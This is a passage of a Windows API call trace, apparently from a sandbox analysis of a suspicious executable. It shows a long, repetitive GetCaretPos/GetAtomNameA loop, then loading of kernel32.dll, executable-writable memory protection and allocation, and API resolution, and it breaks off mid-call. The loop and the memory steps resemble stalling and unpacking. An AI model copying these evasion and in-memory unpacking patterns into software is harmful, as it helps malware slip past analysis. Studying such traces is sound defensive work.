lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0097.949] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0097.949] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0097.949] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0097.949] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0097.949] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0097.949] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0097.949] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0097.949] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0097.949] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0097.949] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0097.949] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0097.949] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0097.949] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0097.949] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0097.949] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0097.949] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0097.949] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0097.949] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0097.949] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0097.949] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0097.949] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0097.949] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0097.949] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0097.949] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0097.949] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0097.949] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0097.949] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0097.950] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0097.950] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0097.950] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0097.950] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0097.950] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0097.950] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0097.950] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0097.950] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0097.950] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0097.950] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0097.950] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0097.950] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0097.950] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0097.950] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0097.950] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0097.950] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0097.950] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0097.950] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0097.950] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0097.950] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0097.950] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0097.950] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0097.950] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0097.950] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0097.950] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0097.950] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0097.950] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0097.950] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0097.950] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0097.951] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0097.951] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0097.951] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0097.951] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0097.951] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0097.951] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0097.951] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0097.951] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0097.951] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0097.951] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0097.951] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0097.951] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0097.951] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0097.951] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0097.951] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0097.951] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0097.951] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0097.951] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0097.951] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0097.951] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0097.951] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0097.951] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0097.951] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0097.951] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0097.951] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0097.951] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0097.951] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0097.951] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0097.951] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0097.951] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0097.952] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0097.952] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0097.952] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0097.952] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0097.952] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0097.952] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0097.952] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0097.952] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0097.952] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0097.952] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0097.952] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0097.952] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0097.952] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0097.952] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0097.952] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0097.952] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0097.952] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0097.952] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0097.952] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0097.952] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0097.952] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0097.952] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0097.952] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0097.952] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0097.952] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0097.952] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0097.952] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0097.952] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0097.952] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0097.952] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0097.953] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0097.953] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0097.953] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0097.953] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0097.953] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0097.953] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0097.953] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0097.953] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0097.953] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0097.953] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0097.953] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0097.953] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0097.953] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0097.953] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0097.953] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0097.953] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0097.953] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0097.953] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0097.953] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0097.953] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0097.953] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0097.953] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0097.953] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0097.953] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0097.953] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0097.953] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0097.953] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0097.953] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0097.953] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0097.953] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0097.954] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0097.954] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0097.954] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0097.954] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0097.954] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0097.954] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0097.954] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0097.954] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0097.954] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0097.954] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0097.954] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0097.954] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0097.954] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0097.954] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0097.954] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0097.954] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0097.954] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0097.954] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0097.954] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0097.954] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0097.954] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0097.954] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0097.954] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0097.954] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0097.954] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0097.954] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0097.954] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0097.954] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0097.954] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0097.954] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0097.955] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0097.955] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0097.955] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0097.955] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0097.955] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0097.955] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0097.955] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0097.955] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0097.955] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0097.955] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0097.955] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0097.955] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0097.955] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0097.955] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0097.955] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0097.955] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0097.955] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0097.955] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0097.955] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0097.955] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0097.955] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0097.955] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0097.955] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0097.955] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0097.955] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0097.955] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0097.955] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0097.955] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0097.955] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0097.955] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0097.956] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0097.956] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0097.956] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0097.956] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0097.956] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0097.956] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0097.956] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0097.956] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0097.956] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0097.956] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0097.956] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0097.956] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0097.956] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0097.956] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0097.956] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0097.956] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0097.956] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0097.956] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0097.956] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0097.956] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0097.956] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0097.956] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0097.956] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0097.956] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0097.956] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0097.956] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0097.956] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0097.956] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0097.956] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0097.956] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0097.957] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0097.957] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0097.957] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0097.957] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0097.957] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0097.957] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0097.957] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0097.957] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0097.957] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0097.957] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0097.957] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0100.759] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x76d30000 [0100.798] VirtualProtect (in: lpAddress=0x210020, dwSize=0x90c00, flNewProtect=0x40, lpflOldProtect=0x18e670 | out: lpflOldProtect=0x18e670*=0x4) returned 1 [0100.918] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x76d30000 [0100.918] GetProcAddress (hModule=0x76d30000, lpProcName="GlobalAlloc") returned 0x76d4588e [0100.918] GetProcAddress (hModule=0x76d30000, lpProcName="GetLastError") returned 0x76d411c0 [0100.918] GetProcAddress (hModule=0x76d30000, lpProcName="Sleep") returned 0x76d410ff [0100.918] GetProcAddress (hModule=0x76d30000, lpProcName="VirtualAlloc") returned 0x76d41856 [0100.918] GetProcAddress (hModule=0x76d30000, lpProcName="CreateToolhelp32Snapshot") returned 0x76d6735f [0100.918] GetProcAddress (hModule=0x76d30000, lpProcName="Module32First") returned 0x76dc5cd9 [0100.919] GetProcAddress (hModule=0x76d30000, lpProcName="CloseHandle") returned 0x76d41410 [0100.919] CreateToolhelp32Snapshot (dwFlags=0x8, th32ProcessID=0x0) returned 0x58 [0100.921] Module32First (hSnapshot=0x58, lpme=0x18e804) returned 1 [0100.924] VirtualAlloc (lpAddress=0x0, dwSize=0x119e50, flAllocationType=0x1000, flProtect=0x40) returned 0x1e30000 [0100.992] GetProcAddress (hModule=0x76d30000, lpProcName="LoadLibraryA") returned 0x76d449d7 [0100.992] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x76d30000 [0100.993] GetProcAddress (hModule=0x76d30000, lpProcName="VirtualAlloc") returned 0x76d41856 [0100.993] GetProcAddress (hModule=0x76d30000, lpProcName="VirtualProtect") returned 0x76d4435f [0100.993] GetProcAddress 